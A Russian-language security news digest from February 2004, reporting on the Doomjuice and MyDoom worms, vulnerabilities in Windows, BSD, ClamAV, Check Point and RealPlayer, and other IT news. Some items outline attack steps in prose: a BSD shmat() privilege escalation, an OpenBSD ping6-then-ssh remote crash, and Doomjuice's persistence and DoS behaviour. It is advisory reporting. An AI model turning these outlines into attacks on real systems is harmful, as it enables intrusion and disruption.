Специалисты компании Microsoft заявили о существовании серьезной ошибки в ряде операционных систем Windows, позволяющих хакерам получить незаконный доступ к компьютеру, на котором установлена система, сообщается на сайте BBC News. Получив доступ к компьютеру, злоумышленник может копировать файлы, уничтожать информацию и следить за действиями пользователя удаленного компьютера. По заявлению Microsoft, ошибка содержится в компонентах ОС Windows NT, 2000, XP и Server 2003. Представители компании присвоили проблеме статус "критической" и призвали пользователей как можно скорее скачать бесплатное обновление с сайта Windows Update. По мнению некоторых аналитиков, проблема, о которой было объявлено - самая серьезная из всех, которые когда либо были обнаружены в Windows, кроме того, последствия ошибки могут распространиться на рекордное количество систем, оснащенных ОС от Microsoft. Специалисты Microsoft, однако, утверждают, что обнаруженная проблема никак не связана с появившимися в последнее время вирусами MyDoom, Doomjuice и Deadhat.
Подробности - http://newsvote.bbc.co.uk/mpapps/...

11/02/2004 12:36 Эпопея Doomjuice продолжается - версия "b" усугубляет положение Microsoft.
Лаборатория Касперского" сообщает о появлении новой версии интернет-червя "Doomjuice" - "Doomjuice.b". Принцип распространения данной вредоносной программы - тот же, что использовался ее предшественником, обнаруженным 9 февраля. Червь производит сканирование адресного пространства интернета в поисках компьютеров, зараженных сетевыми червями "Mydoom.a" или "Mydoom.b". Установив соединение с пораженной машиной через открытый "Mydoom" порт 3127, "Doomjuice.b" пересылает на нее свою копию, а троянская компонента "Mydoom" запускает полученный файл. В то же время, функциональное предназначение "Doomjuice.b" сосредоточено исключительно на DoS-атаке веб-сайта компании Microsoft, www.microsoft.com. Скопировав себя при запуске в системный каталог Windows под именем "REGEDIT.EXE", и зарегистрировав данный файл в ключе автозапуска системного реестра, червь проверяет системную дату. В случае, если текущая дата находится в промежутке между 8 и 12 числом месяца, - функция DoS-атаки не запускается. Также червь не производит DoS-атаку в январе. Таким образом, "Doomjuice.b" будет осуществлять DoS-атаку на сайт www.microsoft.com каждый месяц, за исключением января, с 1-го по 8-е число и с 12-го числа до конца месяца. Для проведения DoS-атаки червь отсылает множественные запросы на 80-й порт сайта www.microsoft.com. При этом используется уникальная для данного вида вирусов технология генерации обращения к серверу - строка созданного червем запроса полностью имитирует формат запроса от популярного веб-браузера Internet Explorer. Это исключает возможность блокирования обращений от зараженных компьютеров, так как ни одно средство сетевой фильтрации не сможет отличить запрос обычного пользователя от инициированного червем. Данная функция значительно увеличивает деструктивный эффект DoS-атаки червя Doomjuice.b. Если эта вредоносная программа получит широкое распространение, дальнейшая жизнеспособность интернет-ресурса компании Microsoft будет поставлена под серьезное сомнение.
Источник - http://www.kaspersky.ru

10/02/2004 16:57 Мобильный Интернет на Pocket PC.
На сайте mobile-review.com опубликована довольно интересная статья Владимира Фокина, посвяшённая описанию процесса подключения PocketPC через протокол пакетной передачи, применяемый в сотовых телефонах GPRS. Преимущество подобного подключения в том, что оплата за услугу берется не за время, проведенное в сети, а за объем переданной/принятой информации. Телефон при этом остается незанятым (если в момент звонка не происходит передача данных). Цены на российский GPRS Интернет позволяют рассматривать его как альтернативу модемному доступу, а в некоторых случаях – даже как альтернативу доступа через локальную сеть (когда требуется постоянное нахождение в сети, и при этом объемы передаваемой/скачиваемой информации невелики). К настоящему моменту все три центральных GSM оператора предоставляют эту услугу на коммерческой основе. Постепенно технология проникает и в регионы.
Подробности - http://www.mobile-review.com/pda/articles/gprs-settings.shtml

10/02/2004 14:59 RedHat включит код SE Linux в Enterprise Linux 4.0.
Компания RedHat объявила, что включит код SE (Security-Enhanced) Linux в свой дистрибутив RHEL 4.0, выпуск которого ожидается в 2005 году. SE Linux является проектом, основанном при активном содействии Агенства Национальной Безопасности (АНБ - NSA по-буржуйски) США, целью которого является добавление модели многоуровневой безопасности в код ОС Linux. Также хотелось бы отметить, что частично код SE Linux уже появился в вышедшем в конце прошлого года ядре Linux 2.6.0.
Подробнее - http://www.itnews.com.au/storycontent.asp?ID=1&Art_ID=18224

10/02/2004 14:28 ISS нашла дыры у Check Point.
В прошлую среду организация Internet Security System (ISS) опубликовала предупреждение об уязвимости продуктов Check Point Firewall-1 и Check Point VPN-1 Server компании Check Point, а также в клиентских приложениях SecuRemote и SecureClient. Вероятность того, что Check Point Firewall-1 не устоит перед хакерской атакой, связана с дефектом в прокси-системе приложения HTTP Security Server, интегрированного во все версии Firewall-1. Обнаруженный ISS программный огрех может позволить сетевым взломщикам изменять или искажать правила и конфигурацию firewall-защиты, подрывая, тем самым, общую безопасность сетей. Другой дефект был выявлен в системе обработки данных ISKMAP, использующейся в продуктах VPN-1 Server, SecuRemote и SecureClient. Ошибка в ISKMAP может открыть хакерам возможность обойти защиту любого сервера с VPN-1 или пользовательских систем на базе SecuRemote или SecureClient, сообщает ISS. Компания также отмечает, что Check Point больше не поддерживает те версии продуктов VPN-1 и SecureRemote/SecureClient, в защите которых была обнаружена брешь. Check Point рекомендует пользователям этих решений обновить свои платформы и перейти на Firewall-1 NG FP1 или более свежие решения.
Источник - http://www.setevoi.ru

10/02/2004 13:41 История создания логотипа ОС Linux.
Довольно часто задают вопрос: "Почему в качестве эмблемы Linux был выбран именно пингвин?". Стив Бэйкер на своём сайте попытался обобщить все известные ему истории создания логотипа ОС Linux, а также имени (TUX - якобы (T)orvalds (U)ni(X) --> TUX!), которое было впоследствии дано пингвину. Как следует из начала статьи, при создании логотипы было решено сделать пародию на появлявшиеся в ием времена логотипы в виде различных акул и орлов. ;)
Подробности - http://www.sjbaker.org/tux/

10/02/2004 13:04 В Литве снова судят чеченский Интернет.
Во вторник Вильнюсский второй участковый суд возобновит рассмотрение по делу о соответствии закону действий интернет-сайта чеченских сепаратистов "Кавказ-Центр". В прошлом году сайт несколько раз пересекал самые различные границы, - физическое положение сервера было замечено в Эстонии, Литве и даже в Англии. В Литве ресурс получал хостинг целых два раза. Департамент госбезопасности республики сделал вывод, что по этому сайту распространяется информация, разжигающая межнациональную и религиозную рознь, пропагандируется терроризм, что противоречит Конституции страны. Из фирмы "Элнета" был изъят сервер, обслуживавший чеченский сайт. Далеко не все политики в Литве сочли такие действия ДГБ законны. Парламентарий Пятрас Гражулись установил сервер в своей квартире в гостинице Сейма, однако эта деятельность была пресечена. После этого сервер "Кавказ-Центра" был установлен в квартире бывшего диссидента в годы советской власти Виктораса Петкуса, откуда работа проекта была возобновлена.
Источник - http://www.rian.ru/

10/02/2004 12:35 Выход Mozilla Firefox 0.8.
Группа разработчиков проекта Mozilla сообщает о выходе новой версии браузера Firebox 0.8. Примечатально, что произошло очередное - третье - изменение название браузера (первое - Phoenix, потом - Firebird и вот теперь - Firefox)! В новой версии появились следующие изменения: браузер для платформы Windows выпускается в виде Installer-а; обновлена и улучшена работа многопоточного менеджера закачек; улучшения в механизме закладок; возможность работы в оффлайне м предварительно закачанными страницами; улучшенная работа с различными типами файлов - ранее, при некорректной передаче .wma и .rar-файлов при некорректной настройке сервера они отбражались в виде мусора; различные исправления багов. Размер дистрибутива для Windows ~ 6.3 МБ.
Подробности - http://www.mozilla.org/products/firefox/releases/

10/02/2004 12:13 В 2003 г. ФСБ выявила 900 попыток проникновения в инфоресурсы госорганов.
В 2003 году ФСБ пресечено более 900 попыток проникновения в информационные ресурсы органов государственной власти России. Эти данные привел заместитель директора Федеральной службы безопасности РФ Вячеслав Ушаков, выступая на учебном семинаре для депутатов Госдумы РФ в подмосковном "Бору". При этом он сообщил, что за этот период в сфере компьютерной безопасности выявлено 112 преступлений, в результате которых 25 человек были осуждены. В отношении 19 были вынесены постановления об административной ответственности.
Источник - http://www.e-rus.ru

10/02/2004 12:04 Microsoft перелатала последний патч.
После инсталляции патча к IE от M$ - MS04-004, вышедшего на прошлой неделе, владельцы ПК и поставщики онлайновых услуг столкнулись с серьезной проблемой. Доступ зарегистрированных клиентов к сетевым ресурсам, использующим при аутентификации URL типа username:password@host.com, оказался просто-напросто закрыт. В результате, многие компании были вынуждены в срочном порядке переделывать свои компьютерные системы, а пользователи - искать альтернативные способы доступа на любимые сайты. Что касается Microsoft, то представители корпорации лишь отметили, что запрет на использование знака @ в веб-адресах лишь повышает безопасность, которой так хотели потребители. Тем не менее, в конце прошлой недели софтверный гигант без лишней шумихи и громких заявлений выложил на своем сайте три обновления для обработчика языка разметки XML третьей версии (Microsoft XML Parser) - Service Pack 2, Service Pack 3, и Service Pack 4. Сервис-паки предлагается установить пользователям ОС Windows 2000, Windows NT, Windows Server 2003 и Windows XP, после чего работоспособность системы аутентификации посредством URL будет полностью восстановлена.
Подробности - http://www.techweb.com/wire/story/TWB20040209S0005

9/02/2004 17:15 Уязвимости в сотовых телефонах Nokia.
Tim Hurman из Pentest Limited обнаружил уязвимость в сотовых телефонах Nokia. На данный момент наличие уязвимости однозначно подтверждено в модели Nokia 6310i. Эта модель телефона обладает возможностью соединения с другими устройства как при помощи ИК-порта, так и при помощи Bluetooth. При этом для обмена сообщениями в обоих случаях используется протокол OBject EXchange (OBEX). Формируя различные неправильные сообщения для этого протокола можно вызвать типичный DoS, заключающийся уходом телефона в перезагрузку с прерыванием всех текущих операций. Фирма Nokia признала факт уязвимости и в текущий момент работает над исправлением её. Приводятся меры по предотвращению подобной атаки.
Подробности - http://www.pentest.co.uk/documents/ptl-2004-01.html

9/02/2004 17:00 В 200 раз быстрее диалапа.
Компания «МТУ-Интел» продолжает подключать москвичей (только физических лиц) к высокоскоростным каналам ADSL на скорости до 7,5 Мбит/с. Круглосуточный интернет без оплаты времени доступа стоит всего $30 в месяц. Теперь эта услуга называется «Стрим». Как известно, ключевые преимущества ADSL — отсутствие оплаты за время доступа, высокая скорость передачи данных (до 7,5 Мбит/с по входящему каналу и до 768 Кбит/с по исходящему), а также всегда свободный телефон. ADSL считается самой дешевой среди технологий, которые обеспечивают широкополосный доступ в интернет, потому что информация передается по обычному телефонному кабелю («медной паре»). Построение инфраструктуры для ADSL, то есть модернизация телефонных станций, обходится значительно дешевле, чем прокладка кабеля в квартиры абонентов или запуск спутника и установка спутниковых антенн. При использовании одной и той же телефонной линии ADSL обеспечивает примерно в 200 раз большую скорость, чем диалап. Дело в том, что медный провод подключен к телефонной станции, которая настроена на прием сигнала шириной 4 кГц. Обычный модем просто подстраивается под возможности телефонной сети, а потому имеет скорость, ограниченную 56 Кбит/с. Однако, технические возможности самой «медной пары» гораздо выше, ее пропускная способность приближается к 1 МГц, и поэтому через нее можно «гонять» данные на мегабитных скоростях, если отсутствуют помехи.
Источник - http://www.webplanet.ru

9/02/2004 16:22 Уязвимость в clamav.
Oliver Eikemeier сообщает об уязвимости в популярном в мире открытых систем антивирусе ClamAV. Ошибка в программе message.c позволяет удалённому атакующему вызвать DoS в самом сканере clamav и, как следствие, в зависимых от него программ - обычно - MTA (clamav прикручивается ко многим почтовым серверам - qmail, sendmail, postfix, exim). Для проведения атаки достаточно сформировать специальным образом составленное при помощи утилиты uuencode сообщение. Для того, чтобы составить подобное сообщение - достаточно одной строки, начинающейся с маленькой буквы. Автором предлагается пример подобного сообщения, а также патч для clamav. Уязвимость обнаружена в версии FreeBSD 4.9-STABLE i386.
Подробности - http://www.freebsd.org/cgi/query-pr.cgi?pr=62586

9/02/2004 16:04 "Правильное" железо для WiFi.
Как сообщает cybervlad на www.bugtraq.ru, WiFi Alliance опубликовал список оборудования для беспроводных сетей, сертифицированного как "WiFi Protected Access". Чтобы гарантировать минимально необходимый уровень безопасности связи, альянс рекомендует использовать только оборудование из этого списка. Сам текст на французском языке, но названия и номера моделей можно прочитать.
http://www.reseaux-telecoms.com/cso_btree/04_02_06_101304_336/CSO/Newscso_view

9/02/2004 15:29 "Неофициальные" спецификации Xbox Next.
Как пишет газета San Jose Mercury News, "Microsoft решила подогреть интерес к новой модификации своей игровой консоли, 'по секрету' рассказав кое-что о ее аппаратной архитектуре". Если нынешняя модель Xbox основана на процессоре архитектуры x86, то в Xbox Next, как утверждается, будет использоваться 64-разрядный процессор, "похожий на применяемый в Apple PowerMac G5, и обеспечивающий консоли более высокую вычислительную мощь, чем у большинства существующих персональных компьютеров". Также в Xbox Next планируется использовать графический процессор разработки ATI, "более быстрый, чем анонсированный компанией недавно R400". Консоль будет оснащаться 256 Мбайт оперативной памяти с возможностью расширения. Для сравнения: нынешняя модификация имеет лишь 64 Мбайт памяти. Относительно обратной совместимости со старой моделью Microsoft пока ничего не сообщила.
Источник - http://www.osp.ru

9/02/2004 14:44 Недельный отчет о вирусах от "Panda Software".
Опубликован традиционный еженедельный отчёт о вирусах от Panda Software. В отчете рассмотрен всем известный Mydoom.A, а также пять принципиально различные типы вредоносных объектов: Mimail.T, Sdbot.MH, Gaobot.DQ, X-Scan.A и Y2k. Mydoom.A – наиболее быстро распространяющийся вредоносный код за всю историю компьютеров. Он стал причиной самой серьезной вирусной эпидемии.
Подробности - http://www.viruslab.ru/press/index.php?go=show&num=239

9/02/2004 14:18 Очередной новый червь - Doomjuice.
"Лаборатория Касперского" сообщает об обнаружении нового сетевого червя, Worm.Win32.Doomjuice, использующего для распространения компьютеры, зараженные любой версией почтового червя I-Worm.Mydoom. Распространяется по глобальным сетям, используя про размножения компьютеры, зараженные червем I-Worm.Mydoom.a или I-Worm.Mydoom.b. Имеет размер 35KB, упакован UPX. Размер распакованного файла - около 43KB. При запуске червь копирует себя в системный каталог Windows с именем "intrenat.exe" и регистрирует данный файл в ключе автозапуска системного реестра: [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] - "Gremlin" = "%system%intrenat.exe". Червь извлекает из себя файл с именем "sync-src-1.00.tbz" и копирует его в корневой каталог, каталог Windows, системный каталог Windows, а также в пользовательские каталоги в Documents and Settings. Данный файл представляет собой архив TAR, содержащий полные исходные тексты I-Worm.Mydoom.a.
Источник - http://www.kaspersky.ru

9/02/2004 13:32 За первый месяц действия антиспамерского закона спама в США меньше не стало.
После вступления в силу с 1 января 2004 года в США федерального антиспамерского закона, получившего название "Can-Spam Act", спама в США рассылаться меньше не стало. Как передает BBC News, это следует из анализа интернет-фирмы Postini, предоставляющей антиспамерские услуги. По ее данным, за месяц действия закона объем спама среди всего почтового трафика снизился с 80 процентов до 79. Согласно выводам экспертов и сделанным ранее прогнозам, закон не только не способствует снижению количества спама, но и наталкивает некоторых бизнесменов на идею воспользоваться спамерскими методами для рекламы своих услуг. Как отмечают специалисты, действующие и потенциальные спамеры, несмотря на предусмотренные новым законом суровые взыскания, могут легко злоупотреблять предусмотренными допущениями, оговаривающими ситуации, когда коммерческие предложения по электронной почте могут быть позволены. Согласно закону, фирмы могут безнаказанно рассылать рекламные письма, если в них указаны легальные координаты и получателю предоставляется возможность отказаться от дельнейшего получения рекламы. Отмечается, что эти положения дают много возможностей обойти закон.
Подробности - http://news.bbc.co.uk/2/hi/technology/3465307.stm

8/02/2004 17:40 Построение безопасного UNIX-сервера.
Опбуликован довольно интересный документ "Securing a Unix Server", автором которого является Kapetanakis Ioannis из Греции. Сам документ является работой, представленной для университета в Лондоне 23 августа 2003 г. В основном статья посвящена ОС Linux и свободному софту, на базе которого автор строит защиту сервера. Помимо общих аспектов безопасности, упор также сделан на защиту публичных сервисов, ака Web-сервер, DNS-сервер, система электронной почты. Наверняка будет представлять интерес для системных администраторов. Выпущен в PDF-формате.
Статья - http://www.linuxsecurity.com/resource_files/host_security/Securing_a_Unix_Server.pdf

8/02/2004 17:22 Плагин DrWeb для Communigate Pro.
Выпущена первая бета-версия антивирусного плагина для программы Communigate Pro. Плагин снабжен универсальным поисковым модулем Dr.Web, возможностью отключения проверки и уведомлений для некоторых адресов или вирусов. В плагине использован высокопроизводительный многопоточный движок для Windows, уже давно используемый в другом продукте семейства Dr.Web - SpIDer Mail. Гибкие настройки плагина для архивов позволяют организовать защиту от zip-death (зависание сканера при проверке сложно сформированных архивов), настраивать тексты уведомлений и оперативно реагировать на различные ситуации - модуль снабжен функциями карантина и редиректа. В его реализацию для Windows, в отличие от Unix-версии, пока не включен механизм лечения почтовых сообщений. Первая бета-версия плагина Dr.Web для CommuniGate Pro является полноценной версией, правда с ограниченным сроком действия - 3 месяца. Поддерживаемые платформы: i386, поддерживаемые версии Windows: NT4, Win2k, WinXP, Server 2003.
Загрузить - ftp://ftp.drweb.ru/pub/betas/drweb-cgp-4.31-beta-win.zip

8/02/2004 16:49 Главный одесский "кардер" пока остается на свободе.
Как уже ранее собщалось, в Одессе при попытке незаконно снять через банкомат крупную сумму денег, используя при этом поддельные пластиковые карточки, сотрудниками управления по борьбе с организованной преступностью совместно с СБУ были задержали трое молодых одесситов. Однако предполагаемый "идейный вдохновитель" одесских мошенников, задержанных одесских кардеро, пока что остается на свободе. Об этом агентству "Репортер" сообщил источник в управлении МВД Одесской области, пожелавший остаться неизвестным. Он отметил, что наблюдение за задержанными велось с весны 2003 года в нескольких регионах Украины. По всей вероятности, задержанные - это "рядовые" исполнители, а "идейный вдохновитель" пока что остается на свободе", отметил компетентный источник. По предварительным подсчетам, за время своей деятельности, задержанным удалось получить незаконным путем приблизительно 370 тысяч долларов. Во время обысков у подозреваемых изъяты поддельные карточки, заготовки для будущих фальшивок, крупная сумма денег в гривнах и устройство для нанесения магнитной информации на пластиковые карточки. "В настоящее время установить точное число жертв пока не удалось", заявил представитель МВД.
Подробности - http://www.crime-research.ru/news/2004/02/0701.html

8/02/2004 16:23 Opera и Motorola создали полноценный WAP-браузер.
Компании Opera Software ASA и Motorola заключили соглашение о совместном продвижении ПО, позволяющего просматривать полноценные HTML-ресурсы интернета через WAP-соединения на мобильных телефонах. ПО объединяет продукт норвежских разработчиков (браузер Opera) и американских программистов (WAP-браузер) из подразделения Global Software Group компании Motorola. Продукт будет лицезироваться операторам, которые смогут извлечь дополнительную прибыль от давнишних инвестиций в инфраструктуру WAP.
Источник - http://www.cnews.ru

8/02/2004 16:08 Что делать с ламерами?
Под таким названием вышла статья Анатолия Ализара на сайте webplanet.ru. «Гики говорят неграмотным юзерам: обучайтесь или отключайтесь» — примерно так в переводе на русский язык называется статья, опубликованная в газете New York Times. В статье описывается типичная ситуация, когда более опытный пользователь ПК испытывает презрение к неграмотному технофобу, который заразился вирусом по собственной глупости. Последняя вирусная эпидемия в очередной раз показала, что каждый из нас так или иначе страдает из-за ламеров, потому что эти недоумки (в статье NYT они политкорректно называются «технофобами») рассылают тысячи зараженных писем, засоряя каналы связи. Они не знают, что такое файрвол, и хуже всего то, что они даже не хотят это знать. Им говорили сотни раз: никогда не открывайте неизвестные файлы, которые пришли по электронной почте. Но примерно миллион человек все-таки запустили у себя на компьютерах вирус «MyDoom» и успешно начали самую крупную вирусную эпидемию в истории Сети. Многие из них отрицают свою вину и говорят, что это вполне естественно — открыть письмо с заголовком «Тест». Таким образом, говорит автор статьи в NYT, расширяется новый вид цифрового раздела между популяциями компьютерных пользователей, которые должны сосуществовать в цифровом мире. Причем вирусы — только вершина айсберга, скрывающая глубинный конфликт между энтузиастами компьютерных технологий с одной стороны и ламерами с другой стороны. Образованные компьютерщики («гики») долго терпели, но события января 2004 года ясно показали, что так жить нельзя. Невозможно постоянно страдать из-за неграмотности коллег и необразованности пользователей в вашей локальной сети. Что же делать с ламерами? Активная дискуссия на эту тему развернулась на сайте Slashdot. От самых радикальных гиков звучат предложения, что нужно срочно ввести лицензирование пользователей интернета, а без лицензии не пускать ламера в Сеть. Или наказывать тех, кто нечаянно распространяет вирусы через свой компьютер. Наказывать их наравне с вирусописателями.
Подробности - http://www.webplanet.ru/news/focus/2004/2/6/lamer.html

8/02/2004 15:33 Беспечные сотрудники играют на руку вирусописателям.
Занятые или равнодушные работники способствуют молниеносному распространению компьютерных вирусов. Английская апатия стоит государственному бизнесу миллионы фунтов стерлингов. Исследователи обнаружили, что две третьих служащих не знают даже элементарных норм техники компьютерной безопасности. 30% сотрудников признались, что слишком заняты, и им некогда проверять «на вирусы» каждое входящее электронное сообщение. 9 из 10 британцев полагают, что они не обязаны участвовать в предотвращении эпидемий. Они перекладывать ответственность на технические департаменты своих компаний. Данное исследование было проведено после недавнего нашествия разрушительных вирусов, включая MyDoom, которое обошлось мировой экономике в 20 миллиардов долларов, - сообщает Ananova.
Источник - http://www.runet.ru

8/02/2004 12:30 Переполнение буфера в FreeBSD, NetBSD и OpenBSD.
Целочисленное переполнение буфера обнаружено в функции shmat() в FreeBSD, NetBSD, и OpenBSD. Локальный пользователь может получить поднятые привилегии на целевой системе. Локальный пользователь может создать общежоступный сегмент памяти, используя shmget(2), и затем создать два отдельных отображения в двух различных местоположениях, используя shmat(2). Затем локальный пользователь может выполнить большое количество некорректных запросов к shmat(2) и затем удалить одно отображение, используя shmdt(2), чтобы вызвать исключение. Затем, чтобы получить поднятые привилегии, программа с set user id (setuid) привилегиями может быть выполнена, чтобы многократно использовать неправильно освобожденную память и записать произвольный код в стек. Обновления доступны через CVS.
Подробности - http://www.securitylab.ru/42637.html

8/02/2004 12:06 Возможность удалённого DoS OpenBSD.
Известный исследователь компьютерной безопасности Georgi Guninski обнаружил возможность проведения удалённой DoS-атаки на ОС OpenBSD (за всё время её существования - это вторая возможность удалённого обрушивания системы). Для осуществления атаки необходимо сформировать ICMP-пакет версии ipv6 с маленьким значением MTU и после посылки пакета (ping6 openbsd_host) осуществить какое - либо TCP-соединение (автор предлагает ssh -6 openbsd_host). Уязвимость обнаружена в версии OpenBSD 3.4, возможно, она существует и в NetBSD. В Current-ветви уязвимости нет. Команда разработчиков выпустила соотв. патч.
Подробности - http://www.guninski.com/obsdmtu.html

8/02/2004 11:14 SCO обвиняет IBM еще и в нарушении авторских прав.
Компания SCO Group значительно расширила свои претензии к IBM, нагрузив и без того сложное дело новым обвинением — в нарушении авторских прав. Это произошло накануне слушаний о том, какую информацию должен предъявить SCO компьютерный гигант, — одного из многих этапов процесса, который должен увенчаться судом 11 апреля 2005 года. Нарушение авторских прав — главный новый пункт, добавленный к уже выдвинутым SCO обвинениям IBM в нарушении контракта и незаконном присвоении коммерческой тайны путем переноса технологии, разработанной для проприетарной системы Unix, в систему с открытым исходным кодом Linux. Процесс привел в некоторое замешательство компьютерное сообщество, в основном благоволящее к Linux, но аналитики, такие как IDC, утверждают, что это вряд ли помешает росту популярности операционной системы.
Подробности - http://www.zdnet.ru/?ID=313408

7/02/2004 17:09 Японская полиция арестовала пособника распространителей пиратской продукции.
4 февраля японская полиция арестовала 40-летнего научного сотрудника Киотского университета Казухо Каваи по подозрению в хищении личных данных с сайта Ассоциации по авторским правам в области программного обеспечения, сообщает сайт газеты Japan Times. В числе похищенных сведений оказались сведения об информаторах Ассоциации, дававших информацию о распространителях пиратской продукции. По данным следствия, инкриминируемое ему деяние Каваи совершил в период с 6 по 8 ноября прошлого года. Хакерская атака на сайт Ассоциации по авторским правам - не первое подобное деяние Каваи. В течение последних трех лет объектами его кибернападений становились веб-ресурсы многих компаний и правительственных структур, в том числе сайт премьер-министра Японии Дзюнитиро Коидзуми. Информацию о пробелах в системе безопасности сайтов Каваи размещал на своей персональной веб-странице, откуда она впоследствии перекочевала на страницы журналов. 40-летнего японца обвиняют также в препятствовании работе Ассоциации по авторским правам, поскольку в нескольких посланиях на имя ее руководителей Каваи обещал полностью закрыть сайт.
Источник - http://www.viruslist.com

7/02/2004 16:07 Американские военные отказались от голосования через интернет.
Американское военное ведомство приняло решение отказаться от системы электронного голосования через интернет. В качестве причины указываются соображения безопасности. Ранее независимые эксперты сделали вывод о том, что в своем нынешнем виде система чересчур уязвима для хакеров и террористов. Никакого доверия к результатам такого голосования быть не может. И хотя ранее Пентагон выражал уверенность в безопасности системы голосования, теперь военные переменили свое мнение. Отказ от использования системы в ходе реального голосования не означает полного провала для Accenture eDemocracy Services. Пентагон продолжит работы по тестированию системы, а Accenture обеспечит ее доводку в соответствии с возросшими требованиями к безопасности. Пока же военнослужащим и обычным гражданам США, находящимся за пределами страны, будет предложена иная система участия в выборах. Возможно, в ней также будет использован интернет, хотя и традиционные технологии голосования не следует сбрасывать со счетов.
Источник - http://www.compulenta.ru

7/02/2004 15:38 Sun сделает тигра Java-программирования совсем ручным.
Sun Microsystems выпустила раннюю редакцию ПО Tiger, которое ляжет в основу будущих Java-приложений для ПК. В среду компания предложила первую бета-версию ПО Java 2 Platform, Standard Edition (J2SE) 1.5, которое вносит ряд усовершенствований в язык программирования Java и программы для исполнения Java-приложений. А в четверг Sun анонсировала программу бета-тестирования продукта J2SE 1.5 с кодовым названием Tiger. Спецификация J2SE содержит правила написания Java-ПО, особенно инструментов разработки, с тем чтобы они включали последние новинки. Окончательная версия J2SE Tiger должна быть готова этим летом. Владельцам лицензий Java, таким как Sun и Borland Software, чтобы добавить новые функции в свои продукты, обычно требуется несколько месяцев. Программное обеспечение J2SE, которое обычно работает на настольных ПК, составляет основу стандарта Java 2 Enterprise Edition для серверных Java-приложений. А спецификация Java 2 Micro Edition предназначена для Java-ПО, которое встраивается в сотовые телефоны и другие карманные устройства. Главная задача новой спецификации Java — упростить программирование на языке Java. Внесенные в Tiger изменения призваны сократить объем кода, который приходится писать программистам, и облегчить процесс установки приложений.
Подробности - http://java.sun.com/j2se/1.5.0/docs/relnotes/features.html

6/02/2004 15:10 Возможность DoS в FreeBSD.
Уязвимость обнаружена в FreeBSD в TCP maximum segment size (MSS) выполнении. Удаленный пользователь может выполнить отказ в обслуживании. Удаленный пользователь может установить чрезмерно низкое MSS значение в течении TCP подключения, чтобы заставить целевую систему послать множество маленьких IP пакетов. В быстрой сети, система может генерировать больше пакетов в секунду, чем способен обработать центральный процессор. Также сообщается, что удаленный пользователь может послать TCP пакеты с TCP грузом не менее одного байта, чтобы заставить выполнить функцию tcp_input() и sowakeup() запрос, которые будет послан (signalled) к связанному процессу на целевой системе, потребляя чрезмерные ресурсы на целевой системе. Исправление доступно через CVS-репозитарий для следующих файлов: ip_icmp.c, tcp.h, tcp_input.c, tcp_subr.c, tcp_usrreq.c, and tcp_var.h.
Подробности - http://www.securitylab.ru/42584.html

6/02/2004 15:07 Патч для ограничения числа запросов для VirtualHost в apache.
Опубликован патч одного из наших соотечественников к mod_limitipconn, позволяющий выставить дополнительные ограничения для VirtualHost и защитить систему от краха при перегрузке. Введены директивы: MaxConnPerUid - максимальное число одновременно обслуживаемых запросов для одного пользователя (User в VirtualHost); MaxConnPerVhost - максимально допустимое число одновременных запросов на один виртуальный хост (VirtualHost). Удобно использовать в системах хостинга, для предотвращения забирания всех ресурсов одним хостером; MaxLA1, MaxLA5, MaxLA15 - значения Load average при превышении которых работа всех CGI и PHP скриптов (и прочей динамики)будет заблокирована. Проверка осуществляется только при запросе скрипта. Не обязательно указывать все три директивы достаточно одной, например: "MaxLA5 50". Рекомендуется указывать заведомо нереально большие значения, для блокирования только в самых критических ситуациях.
Подробности - http://www.opennet.ru/opennews/art.shtml?num=3381

6/02/2004 14:45 Обнаружена опасная дыра в RealOne Player.
Британская компания Next-Generation Security Software, специализирующаяся на вопросах компьютерной безопасности, сообщила об обнаружении опасной дыры в программных продуктах компании RealNetworks. Суть проблемы сводится к тому, что при проигрывании сформированного определенным образом музыкального или видеофайла на уязвимой машине может быть выполнен произвольный вредоносный код. При этом злоумышленник получит доступ к системе с правами текущего пользователя. Опасность представляют следующие форматы файлов: RAM, RPM, RP, RT и SMIL, воспроизводимые с помощью программных плееров RealOne Player, RealOne Player второй версии, RealPlayer 8 и RealPlayer 10 (бета-версия). На сегодняшний день клиентская база RealNetworks насчитывает свыше 350 миллионов зарегистрированных пользователей, и компьютеры многих из них оказались под угрозой взлома. Впрочем, реальных случаев проникновения в чужие системы посредством дыры в плеерах RealNetworks пока зарегистрировано не было. Тем не менее, разработчики рекомендуют обновить программное обеспечение при первой же возможности.
Подробности - http://news.com.com/2100-7349_3-5154193.html

6/02/2004 13:29 Выход DrWeb 4.31.
4 февраля вышла новая версия популярного антивируса, выпускаемого Санкт-Петербургской антивирусной лабораторией И.Данилова. В новой версии: усовершенствован алгоритм проверки файлов, влюченных в автозагрузку; оптимизирована работа с памятью; реализована проверка файлов запущенных процессов в рамках проверки файлов автозагрузки; усовершенствован алгоритм разбора ZIP, CAB и CAB SFX архивов; усовершенствован алгоритм разбора MIME-объектов; усовершенствованы алгоритмы лечения, удаления и перемещения инфицированных файлов; добавлена возможность запуска задач из планировщика при появлении связи; усовершенствован механизм автоматического перехвата почтовых соединений для проверки почтовых сообщений программой SpIDer Mail etc.
Источник - http://www..drweb.ru

6/02/2004 12:18 KDE 3.2: новая версия менеджера рабочего стола.
Меньше чем через неделю после выпуска KDE 3.1 сообщество разработчиков менеджера рабочего стола для Linux представило новую версию пакета программ под номером 3.2, сообщает "Компьюлента". Несмотря на небольшое увеличение в номере версии пакета, в KDE 3.2 произошли довольно серьезные изменения. Главным нововведением стало снижение времени запуска программ, входящих в состав KDE. Серьезная оптимизация кода позволяет разрабочтикам называть новую версию самой быстрой из всех имеющихся. Кроме того, значительно увеличена производительность веб-браузера Konqueror и улучшена его совместимость с сетевыми стандартами. Это произошло благодаря совместной работе разработчиков KDE и программистов Apple, работающих над веб-браузером Safari. Еще одним важным обновлением стало большее соответствие KDE 3.2 стандартам, разработанным группой FreeDesktops.org. Это скажется на универсальности использования менеджера рабочего стола в различных версиях Linux и Unix-систем. Скачать новую версию KDE 3.2 можно на одном из серверов-зеркал, список которых представлен на сайте разработчиков.
Подробности - http://www.kde.org/announcements/announce-3.2.php

6/02/2004 11:43 В США будут сажать на семь лет за регистрацию вебсайта под фальшивым именем.
